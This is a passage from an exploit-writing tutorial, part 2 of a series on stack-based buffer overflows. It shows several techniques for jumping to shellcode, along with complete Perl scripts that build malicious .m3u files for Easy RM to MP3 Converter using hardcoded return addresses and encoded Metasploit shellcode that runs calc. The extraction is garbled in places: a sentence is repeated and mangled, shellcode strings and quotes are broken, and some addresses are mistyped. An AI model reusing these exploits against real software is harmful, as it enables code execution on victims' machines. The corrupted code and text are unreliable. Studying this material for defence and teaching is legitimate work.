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:: [Knowledge is not an object, it's a flow] ::

Exploit writing tutorial part 2 : Stack Based Overflows - jumping to shellcode

Peter Van Eeckhoutte · Thursday, July 23rd, 2009

Where do you want to jmp today ?

In one of my previous posts (part 1 of writing stack based buffer overflow exploits), I have explained the basisc about discovering a vulnerability and using that information to build a working exploit. In the example I have used in that post, we have seen that ESP pointed almost directly at the begin of our buffer (we only had to prepend 4 bytes to the shellcode to make ESP point directly at the shellcode), and we could use a "jmp esp" statement to get the shellcode to run.

Note : This tutorial heavily builds on part 1 of the tutorial series, so please take the time to fully read and understand part 1 before reading part 2. The fact that we could use "jmp esp" was an almost perfect scenario. It's not that 'easy' every time. Today I'll talk about some other ways to execute/jump to shellcode, and finally about what your options are if you are faced with small buffer sizes.

There are multiple methods of forcing the execution of shellcode.

- jump (or call) a register that points to the shellcode. With this technique, you basically use a register that contains the address where the shellcode resides and put that address in EIP. You try to find the opcode of a "jump" or "call" to that register in one of the dll's that is loaded when the application runs. When crafting your payload, instead of overwriting EIP with an address in terms, you need to overwrite EIP with the address of the "jump to the register". Of course, this only works if one of the available registers contains an address that points to the shellcode. This is how we managed to get our exploit to work in part 1, so I'm not going to discuss this technique in this post anymore.
 pop return : If none of the registers point directly to the shellcode, but you can see an address on the stack (first, second, ... address on the stack) that points to the shellcode, but you can see an address or the stack (linet, second, ... address or the stack) that points to the shellcode, but you can see an address or the stack (linet, second, ... address or the stack) that points to the shellcode.
- pop return : If none of the registers point directly to the shellcode, but you can see an address on the stack (first, second, ... address on the stack) that points to the shellcode then you can load that value into EIP by first putting a pointer to pop ret, or pop pop ret, or pop pop pop ret (all depending on the location of where the address is found on the stack) into EIP.
- push return : this method is only slightly different than the "call register" technique. If you cannot find a <jump register> or <call register> opcode anywhere, you could simply put the address on the stack and then do a ret. So you basically try to find a push <register>, followed by a ret. Find the opcode for this sequence, find an address that performs this sequence, and overwrite EIP with this address.
- imp [reg + offset]: If there is a register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or application dll's, which will add the required bytes to the register and then jumps to the register. I'll refer to this method as jmp [reg]+[offset]
 blind return : in my previous post I have explained that ESP points to the current stack position (by definition). A RET instruction will 'pop' the last value (4bytes) from the
- stack and will put that address in ESP. So if you overwrite EIP with the address that will perform a RET instruction, you will load the value stored at ESP into EIP.
- If you are faced with the fact that the available space in the buffer (after the EIP overwrite) is limited, but you have plenty of space before overwriting EIP, then you could use jump code in the smaller buffer to jump to the main shellcode in the first part of the buffer.
- SEH: Every application has a default exception handler which is provided for by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanation before you can start abusing the SEH to write exploits. The idea behind this is that if you build an exploit that does not work on a given OS, then the payload might just crash the application (and trigger an exception). So if you can combine a "regular" exploit with a seh based exploit, then you have build a more reliable exploit. Anyways, the next part of the exploit writing tutorial series (part 3) will deal with SEH. Just remember that a typical stack based overflow, where you overwrite EIP, could potentionally be subject to a SEH based exploit technique as well, giving you more stability, a larger buffer size (and overwriting EIP would trigger SEH... so it's a win win)

The techniques explained in this document are just examples. The goal of this post is to explain to you that there may be various ways to jump to your shellcode, and in other cases there may be only one (and may require a combination of techniques) to get your arbitrary code to run.

There may be many more methods to get an exploit to work and to work reliably, but if you master the ones listed here, and if you use your common sense, you can find a way around most issues when trying to make an exploit jump to your shellcode. Even if a technique seems to be working, but the shellcode doesn't want to run, you can still play with shellcode encoders, move shellcode a little bit further and put some NOP's before the shellcode... these are all things that may help making your exploit work.

Of course, it is perfectly possible that a vulnerability only leads to a crash, and can never be exploited. Let's have a look at the practical implementation of some of the techniques listed above.

call [reg]

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If a register is loaded with an address that directly points at the shellcode, then you can do a call [reg] to jump directly to the shellcode. In other words, if ESP directly points at the shellcode (so the first byte of ESP is the first byte of your shellcode), then you can overwrite EIP with the address of "call esp", and the shellcode will be executed. This works with all registers and is quite popular because kernel32.dll contains a lot of call [reg] addresses.

Quick example : assuming that ESP points to the shellcode : First, look for an address that contains the 'call esp' opcode. We'll use findjmp :

findjmp.exe kernel32.dll esp

```
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x7C836A08 call esp
0x7C874413 jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses
```

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Next, write the exploit and overwrite EIP with 0×7C836A08.

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From the Easy RM to MP3 example in the first part of this tutorial series, we know that we can point ESP at the beginning of our shellcode by adding 4 characters between the place where EIP is overwritten and ESP. A typical exploit would then look like this :

my \$file= "test1.m3u"; my \$junk= "A" x 26094;

my \$eip = pack('V',0x7C836A08); #overwrite EIP with call esp

my \$prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes

my \$shellcode = "\x90" x 25; #start shellcode with some NOPS

windows/exec - 303 bytes

http://www.metasploit.com

Encoder: x86/alpha_upper # EXITFUNC=seh, CMD=calc

```
$$hellcode = $$hellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49" .
 \x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x30\x41\x30\x41\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x49\x4b\x4c\x4a\
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a
"\x31\x49\x50\x4c\x59\x4e\x4c\x44\x49\x50\x43\x44\x43"
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47'
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x54"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
```

```
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" "
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" "
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" "
\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
```

```
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
```

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pwned !

pop ret

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As explained above, In the Easy RM to MP3 example, we have been able to tweak our buffer so ESP pointed directly at our shellcode. What if there is not a single register that points to the shellcode ?

Well, in this case, an address pointing to the shellcode may be on the stack. If you dump esp, look at the first addresses. If one of these addresses points to your shellcode (or a buffer you control), then you can find a pop ret or pop pop ret (nothing to do with SEH based exploits here) to

- take addresses from the stack (and skip them)

- jump to the address which should bring you to the shellcode.

The pop ret technique obviously is only usabled when ESP+offset already contains an address which points to the shellcode... So dump esp, see if one of the first addresses points to the shellcode, and put a reference to pop ret (or pop pop ret or pop pop pop ret) into EIP. This will take some address from the stack (one address for each pop) and will then put the next address into EIP. If that one points to the shellcode, then you win.

There is a second use for pop ret : what if you control EIP, no register points to the shellcode, but your shellcode can be found at ESP+8. In that case, you can put a pop pop ret into EIP, which will jump to ESP+8. If you put a pointer to jmp esp at that location, then it will jump to the shellcode that sits right after the jmp esp pointer.

Let's build a test case. We know that we need 26094 bytes before overwriting EIP, and that we need 4 more bytes before we are at the stack address where ESP points at (in my case, this is 0×000ff730).

We will simulate that at ESP+8, we have an address that points to the shellcode. (in fact, we'll just put the shellcode behind it – again, this is just a test case). 26094 A's, 4 XXXX's (to end up where ESP points at), then a break, 7 NOP's, a break, and more NOP's. Let's pretend the shellcode begins at the second break. The goal is to make a jump over the first break, right to the second break (which is at ESP+8 bytes = 0×000ff738).

my \$file= "test1.m3u"; my \$junk= "A" x 26094; my \$eip = "BBBB"; #overwrite EIP my \$prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes my \$shellcode = "\xcc"; #first break \$shellcode = \$shellcode . "\x90" x 7; #add 7 more bytes \$shellcode = \$shellcode . "\xcc"; #second break \$shellcode = \$shellcode . "\xcc"; #second break \$shellcode = \$shellcode . "\x90" x 500; #real shellcode open(\$FILE, ">\$file"); print \$FILE \$junk.\$eip.\$prependesp.\$shellcode; close(\$FILE;); print "m3u File Created successfully\n";

Let's look at the stack :

http://www.corelan.be:8800

Application crashed because of the buffer overflow. We've overwritten EIP with "BBBB". ESP points at 000ff730 (which starts with the first break), then 7 NOP's, and then we see the second break, which really is the begin of our shellcode (and sits at address 0×000ff738).

```
eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=000067fa
eip=42424242 esp=000ff730 ebp=00344200 iopl=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                               nv up ei pl nz na pe nc
 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             efl=00000206
 Missing image name, possible paged-out or corrupt data.
 Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
<Unloaded_P32.dll>+0x42424231:
42424242 ?? ???
90 90 90 90 90 90 90-90 90 90 90 90 90 90 90
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             . . . . . . . . . . . . . . . .
 000ff750
                                                                                   90 \hspace{0.1in} 90 \hspace
 000ff760
                                                                                   90 \hspace{0.1in} 90 \hspace
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 000ff790
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 000ff7a0
                                                                                 . . . . . . . . . . . . . . . .
 0:000> d 000ff738
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                                                                                   cc 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
 000ff748
                                                                                   90 \hspace{0.1in} 90 \hspace
                                                                                   90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90
 000ff758
 000ff768
                                                                                   90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
                                                                                   90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
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The goal is to get the value of ESP+8 into EIP (and to craft this value so it jumps to the shellcode). We'll use the pop ret technique + address of jmp esp to accomplish this. One POP instruction will take 4 bytes off the top of the stack. So the stack pointer would then point at 000ff734. Running another pop instruction would take 4 more bytes off the top of the stack. ESP would then point to 000ff738. When we a "ret" instruction is performed, the value at the current address of ESP is put in EIP. So if the value at 000ff738 contains the address of a jmp esp instruction, then that is what EIP would do. The buffer after 000ff738 must then contains our shellcode.

We need to find the pop,pop,ret instruction sequence somewhere, and overwrite EIP with the address of the first part of the instruction sequence, and we must set ESP+8 to the address of jmp esp, followed by the shellcode itself.

First of all, we need to know the opcode for pop pop ret. We'll use the assemble functionality in windbg to get the opcodes :

eax,dword ptr [esp+4]

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0:000> a			
7c90120e	pop eax		
pop eax			
7c90120f	pop ebp		
pop ebp			
7c901210	ret		
ret			
7c901211			
0:000> u	7c90120e		
ntdll!Dbg	BreakPoint:		
7c90120e	58	рор	eax
7c90120f	5d	рор	ebp
7c901210	c3	ret	
7c901211	ffcc	dec	esp
7c901213	c3	ret	
7c901214	8bff	mov	edi,edi

so the pop pop ret opcode is $0 \times 58, 0 \times 5d, 0xc3$

7c901216 8b442404

7c90121a cc

Of course, you can pop to other registers as well. These are some other available pop opcodes :

mov

int

<u>pop register</u>	<u>opcode</u>
pop eax	58
pop ebx	5b
рор есх	59

pop edx	5a
pop esi	5e
pop ebp	5d

Now we need to find this sequence in one of the available dll's. In part 1 of the tutorial we have spoken about application dll's versus OS dll's. I guess it's recommended to use application dll's because that would increase the chances on building a reliable exploit across windows platforms/versions... But you still need to make sure the dll's use the same base addresses every time. Sometimes, the dll's get rebased and in that scenario it could be better to use one of the os dll's (user32.dll or kernel32.dll for example)

Open Easy RM to MP3 (don't open a file or anything) and then attach windbg to the running process.

Windbg will show the loaded modules, both OS modules and application modules. (Look at the top of the windbg output, and find the lines that start with ModLoad). These are a couple of application dll's

ModLoad:	00ce0000	00d7f000	C:\Program	Files\Easy	RM	to	MP3	Converter\MSRMfilter01.dll
ModLoad:	01a90000	01b01000	C:\Program	Files\Easy	RM	to	MP3	Converter\MSRMCcodec00.dll
ModLoad:	00c80000	00c87000	C:\Program	Files\Easy	RM	to	MP3	Converter\MSRMCcodec01.dll
ModLoad:	01b10000	01fdd000	C:\Program	Files\Easy	RM	to	MP3	Converter\MSRMCcodec02.dll

you can show the image base of a dll by running dumpbin.exe (from Visual Studio) with parameter /headers against the dll. This will allow you to define the lower and upper address for searches.

You should try to avoid using addresses that contain null bytes (because it would make the exploit harder... not impossible, just harder.) A search in MSRMCcodec00.dll gives us some results :

0:014> s	01a900	00	L 01	Lb01	.000	58	3 5d c3	3							
01ab6a10	58 5d	c3	33	сØ	5d	c3	55-8b	ec	51	51	dd	45	08	dc	X].3.].UQQ.E
01ab8da3	58 5d	c3	8d	4d	08	83	65-08	00	51	6a	00	ff	35	6c	X]MeQj5l
01ab9d69	58 5d	c3	6a	02	eb	f9	6a-04	eb	f5	b8	00	02	00	00	X].jj

Ok, we can jump to ESP+8 now. In that location we need to put the address to jmp esp (because, as explained before, the ret instruction will take the address from that location and put it in EIP. At that point, the ESP address will point to our shellcode which is located right after the jmp esp address... so what we really want at that point is a jmp esp)

From part 1 of the tutorial, we have learned that $0{\times}01ccf23a$ refers to jmp esp.

Ok, let's go back to our perl script and replace the "BBBB" (used to overwrite EIP with) with one of the 3 pop,pop,ret addresses, followed by 8 bytes (NOP) (to simulate that the shellcode is 8 bytes off from the top of the stack), then the jmp esp address, and then the shellcode. The buffer will look like this :

[AAAAAAAAAAAA...AA][0x0lab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x0lccf23a][Shellcode] 26094 A's EIP 8 bytes offset JMP ESP (=POPPOPRET)

The entire exploit flow will look like this :

1 : EIP is overwritten with POP POP RET (again, this example has nothing to do with SEH based exploits. We just want to get a value that is on the stack into EIP). ESP points to begin of 8byte offset from shellcode

2 : POP POP RET is executed. EIP gets overwritten with 0×01ccf23a (because that is the address that was found at ESP+0×8). ESP now points to shellcode. 3 : Since EIP is overwritten with address to jmp esp, the second jump is executed and the shellcode is launched.



We'll simulate this with a break and some NOP's as shellcode, so we can see if our jumps work fine.

```
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x0lab6a10); #pop pop ret from MSRMfilter01.dll
my $jmpesp = pack('V',0x0lccf23a); #jmp esp
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 8; #add more bytes
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
$shellcode = $shellcode . "\xcc" . "\x90" x 500; #real shellcode
open($FILE,"$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
(d08.384): Break instruction exception - code 80000003 (!!! second chance !!!)
```

(d08.384): Break instruction exception - code 80000003 (!!! second charce !!!) eax=90909090 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=000067fe eip=000ff73c esp=000ff73c ebp=90909090 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206

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Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. <Unloaded P32.dll>+0xff72b: 000ff73c cc 3 int 0:000> d esp 000ff73c 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 сс 000ff74c $90 \hspace{0.1in} 90 \hspace$ 000ff75c $90 \hspace{0.1in} 90 \hspace$ 000ff76c 90 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 000ff77c . . . 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 000ff78c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff79c . Cool. that worked. Now let's replace the NOPs after jmp esp (ESP+8) with real shellcode (some nops to be sure + shellcode, encoded with alpha_upper) (execute calc): my \$file= "test1.m3u"; my \$junk= "A" x 26094; my \$eip = pack('V',0x0lab6a10); #pop pop ret from MSRMfilter01.dll my \$jmpesp = pack('V',0x01ccf23a); #jmp esp my \$prependesp = "XXXX"; #add 4 bytes so ESM my \$shellcode = " \times 90" x 8; #add more bytes #add 4 bytes so ESP points at beginning of shellcode bytes \$shellcode = \$shellcode . \$jmpesp; #address to return via pop pop ret (= jmp esp) \$shellcode = \$shellcode . "\x90" x 50; #real shellcode # windows/exec - 303 bytes # http://www.metasploit.com # Encoder: x86/alpha_upper # EXITFUNC=seh, CMD=calc $\label{eq:stable} $$ $$ x89 xe2 xda xc1 xd9 x72 xf4 x58 x50 x59 x49 x49 x49 x49 . $$$ \$shellcode = \$shellcode . '\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x41\x30\x41" "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a' "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" "\x31\x49\x50\x4c\x59\x4e\x4c\x44\x49\x50\x43\x44\x43' "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" '\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c' "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" $\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50\$ "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" $\x4c\x4b\x44\x30\x45\x4c\x4b\x45\x38\x43"$ "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" "\x31\x42\x4c\x42\x43\x45\x50\x41\x41"; open(\$FILE,">\$file"); print \$FILE \$junk.\$eip.\$prependesp.\$shellcode; close(\$FILE) print "m3u File Created successfully\n"; MP3 Co MP3 Co werter MSRMfilter02





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push return

push ret is somewhat similar to call [reg]. If one of the registers is directly pointing at your shellcode, and if for some reason you cannot use a jmp [reg] to jump to the shellcode, then you could

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• put the address of that register on the stack. It will sit on top of the stack. ret (which will take that address back from the stack and jump to it)

In order to make this work, you need to overwrite EIP with the address of a push [reg] + ret sequence in one of the dll's. Suppose the shellcode is located directly at ESP. You need to find the opcode for 'push esp' and the opcode for 'ret' first

0:000> a 000ff7ae push esp push esp 000ff7af ret ret

0:000> u 000ff7ae <Unloaded_P32.dll>+0xff79d: 000ff7ae 54 pu push esp 000ff7af c3 ret

opcode sequence is 0×54,0xc3

Search for this opcode :

http://www.corelan.be:8800

0:000> s	01a9	9000	90 1	L 01	ldfi	F000) 54	1 c3								
01aa57f6	54	c3	90	90	90	90	90	90-90	90	8b	44	24	08	85	с0	ΤD\$
01b31d88	54	c3	fe	ff	85	сØ	74	5d-53	8b	5c	24	30	57	8d	4c	Tt]S.\\$0W.L
01b5cd65	54	c3	8b	87	33	05	00	00-83	f8	06	0f	85	92	01	00	Т3
01b5cf2f	54	c3	8b	4c	24	58	8b	c6-5f	5e	5d	5b	64	89	0d	00	TL\$X^][d
01b5cf44	54	c3	90	90	90	90	90	90-90	90	90	90	8a	81	da	04	Т
01bbbb3e	54	c3	8b	4c	24	50	5e	33-c0	5b	64	89	0d	00	00	00	TL\$P^3.[d
01bbbb51	54	c3	90	90	90	90	90	90-90	90	90	90	90	90	90	6a	Тј
01bf2aba	54	c3	0c	8b	74	24	20	39-32	73	09	40	83	c2	08	41	Tt\$ 92s.@A
01c0f6b4	54	c3	b8	0e	00	07	80	8b-4c	24	54	5e	5d	5b	64	89	TL\$T^][d.
01c0f6cb	54	c3	90	90	90	64	a1	00-00	00	00	6a	ff	68	3b	84	Tdj.h;.
01c692aa	54	c3	90	90	90	90	8b	44-24	04	8b	4c	24	08	8b	54	TD\$L\$T
01d35a40	54	c3	c8	3d	10	e4	38	14-7a	f9	ce	f1	52	15	80	d8	T=8.zR
01d4daa7	54	c3	9f	4d	68	ce	са	2f-32	f2	d5	df	1b	8f	fc	56	TMh/2V
01d55edb	54	c3	9f	4d	68	ce	са	2f-32	f2	d5	df	1b	8f	fc	56	TMh/2V
01d649c7	54	c3	9f	4d	68	ce	ca	2f-32	f2	d5	df	1b	8f	fc	56	TMh/2V
01d73406	54	c3	d3	2d	d3	c3	3a	b3-83	c3	ab	b6	b2	c3	0a	20	Τ
01d74526	54	c3	da	4c	3b	43	11	e7-54	c3	сс	36	bb	c3	f8	63	TL;CT6c
01d7452e	54	c3	сс	36	bb	c3	f8	63-3b	44	d8	00	d1	43	f5	f3	T6c;DC
01d74b26	54	c3	са	63	f0	c2	f7	86-77	42	38	98	92	42	7e	1d	TcwB8B~.
031d3b18	54	c3	f6	ff	54	c3	f6	ff-4f	bd	f0	ff	00	6c	9f	ff	TT0l
031d3b1c	54	c3	f6	ff	4f	bd	f0	ff-00	6c	9f	ff	30	ac	d6	ff	ΤΟlΘ

Craft your exploit and run :

```
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x01aa57f6); #overwrite EIP with push esp, ret
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 25; #start shellcode with some NOPS
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
$$hellcode = $$hellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
'\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x49\x4b\x4c\x4a"
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c'
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
'\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50'
'\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43"
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
\x4b\x51\x4f\x51\x4f\x51\x4b\x42\x46\x4c\x4b\x44"
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"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47"
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42"
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45"
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE):
```

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print "m3u File Created successfully\n";

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pwned again !

jmp [reg]+[offset]

Another technique to overcome the problem that the shellcode begins at an offset of a register (ESP in our example) is by trying to find a jmp [reg + offset] instruction (and overwriting EIP with the address of that instruction). Let's assume that we need to jump 8 bytes again (see previous exercise). Using the jmp reg+offset technique, we would simply jump over the 8 bytes at the beginning of ESP and land directly at our shellcode. We need to do 3 things :

• find the opcode for imp esp+8h

find an address that points to this instruction

· craft the exploit so it overwrites EIP with this address

Finding the opcode : use windbg :

```
0:014> a
7c90120e jmp [esp + 8]
jmp [esp + 8]
7c901212
0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408 jmp dword ptr [esp+8]
```

The opcode is ff642408

Now you can search for a dll that has this opcode, and use the address to overwrite EIP with. In our example, I could not find this exact opcode anywhere. Of course, you are not limited to looking for jmp [esp+8]... you could also look for values bigger than 8 (because you control anything above 8... you could easily put some additional NOP's at the beginning of the shellcode and make the jump into the nop's...

(by the way: Opcode for ret is c3. But I'm sure you've already figured that our for yourself)

Blind return

This technique is based on the following 2 steps:

- Overwrite EIP with an address pointing to a ret instruction
- Hardcode the address of the shellcode at the first 4 bytes of ESP
- When the ret is execute, the last added 4 bytes (topmost value) are popped from the stack and will be put in EIP

Exploit jumps to shellcode

So this technique is useful if

 you cannot point EIP to go a register directly (because you cannot use jmp or call instructions. (This means that you need to hardcode the memory address of the start of the shellcode). but

• you can control the data at ESP (at least the first 4 bytes)

In order to set this up, you need to have the memory address of the shellcode (= the address of ESP). As usual, try to avoid that this address starts with / contains null bytes, or you will not be able to load your shellcode behind EIP. If your shellcode can be put at a location, and this location address does not contain a null byte, then this would be another working technique.

Find the address of a 'ret' instruction in one of the dll's

Set the first 4 bytes of the shellcode (first 4 bytes of ESP) to the address where the shellcode begins, and overwrite EIP with the address of the 'ret' instruction. From the tests we have done in the first part of this tutorial, we remember that ESP seems to start at 0x000ff730. Of course this address could change on different systems, but if you have no other way than hardcoding addresses, then this is the only thing you can do.

This address contains null byte, so when building the payload, we create a buffer that looks like this :

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[26094 A's][address of ret][0x000fff730][shellcode]

The problem with this example is that the address used to overwrite EIP contains a null byte. (= string terminator), so the shellcode is not put in ESP. This is a problem, but it may not be a showstopper. Sometimes you can find your buffer (look at the first 26094 A's, not at the ones that are pushed after overwriting EIP, because they will be unusable because of null byte) back at other locations/registers, such as eax, ebx, ecx, etc... In that case, you could try to put the address of that register as the first 4 bytes of the shellcode (at the beginning of ESP, so directly after overwriting EIP), and still overwrite EIP with the address of a 'ret' instruction.

This is a technique that has a lot of requirements and drawbacks, but it only requires a "ret" instruction... Anyways, it didn't really work for Easy RM to MP3.

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Dealing with small buffers : jumping anywhere with custom jumpcode

We have talked about various ways to make EIP jump to our shellcode. In all scenario's, we have had the luxury to be able to put this shellcode in one piece in the buffer. But what if we see that we don't have enough space to host the entire shellcode ?

In our exercise, we have been using 26094 bytes before overwriting EIP, and we have noticed that ESP points to 26094+4 bytes, and that we have plenty of space from that point forward. But what if we only had 50 bytes (ESP -> ESP+50 bytes). What if our tests showed that everything that was written after those 50 bytes were not usable ? 50 bytes for hosting shellcode is not a lot. So we need to find a way around that. So perhaps we can use the 26094 bytes that were used to trigger the actual overflow.

First, we need to find these 26094 bytes somewhere in memory. If we cannot find them anywhere, it's going to be difficult to reference them. In fact, if we can find these bytes and find out that we have another register pointing (or almost pointing) at these bytes, it may even be quite easy to put our shellcode in there. If you run some basic tests against Easy RM to MP3, you will notice that parts of the 26094 bytes are also visible in the ESP dump

my \$file= "test1.m3u' my \$filte= cestimod ,
my \$junk= "A" x 26094;
my \$eip = "BBBB"; my spreshellcode = "X" x 54; #let's pretend this is the only space we have available "\x90" x 230; #added some nops to visually separate our 54 X's from other data open(\$FILE,">\$file");
print \$FILE \$junk.\$eip.\$preshellcode.\$nop; close(\$FILE): print "m3u File Created successfully\n";

After opening the test1.m3u file, we get this :

